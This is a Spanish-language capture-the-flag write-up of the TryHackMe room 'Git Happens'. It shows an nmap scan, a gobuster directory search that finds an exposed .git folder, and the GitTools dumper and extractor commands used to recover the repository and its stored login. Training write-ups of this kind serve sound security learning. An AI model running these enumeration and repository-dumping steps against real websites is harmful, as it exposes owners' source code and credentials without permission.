This page looks best with JavaScript enabled

TryHackMe - Git Happens

 •  ✍️ sckull
featured image

Git Happens es una maquina de TryHackMe el cual expone un .git y donde utilizando GitTools para obtener informacion.

Room

Titulo Git Happens box_img_maker
Descripción Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy!
Puntos 80
Dificultad Facil
Maker

hydragyrum

NMAP

Escaneo de puertos tcp, nmap nos muestra el puerto http (80) abierto.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# Nmap 7.80 scan initiated Mon Aug 31 17:41:27 2020 as: nmap -sV -o mini_scan git.thm
Nmap scan report for git.thm (10.10.187.108)
Host is up (0.33s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 31 17:42:05 2020 -- 1 IP address (1 host up) scanned in 38.04 seconds

HTTP

Encontramos una pagina web con un panel en el puerto 80.

image

En el codigo fuente de la pagina encontramos codigo javascript ofuscado, con un array que contiene informacion “desordenada”.

image

GOBUSTER

Utilizamos gobuster para busqueda de directorios y archivos.

1
2
3
4
5
6

kali@kali:~/thm/githappens$ gobuster dir -u http://git.thm/ -w $LIST/dirb/common.txt -q -t 25 -x php,html,txt
/.git/HEAD (Status: 200)
/css (Status: 301)
/dashboard.html (Status: 200)
/index.html (Status: 200)
/index.html (Status: 200)

GITTOOLS

Encontramos el directorio .git con gobuster, utilizamos GitTools al igual que en Harder de TryHackme para obtener la informacion expuesta disponible.

image

1

~/tools/GitTools/Dumper/gitdumper.sh http://git.thm/.git/ .

image

Una vez utilizado el Dumper ejecutamos el Extractor de GitTools o podemos utilizar el propio Git para recuperar la informacion.

1
2
3
4
5

#Git Extractor
~/tools/GitTools/Extractor/extractor.sh . .

#Git 
git checkout -- .

Vemos en uno de los archivos anteriores el usuario y contraseña el cual es el objetivo de esta sala.

image

Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

THM: Git Happens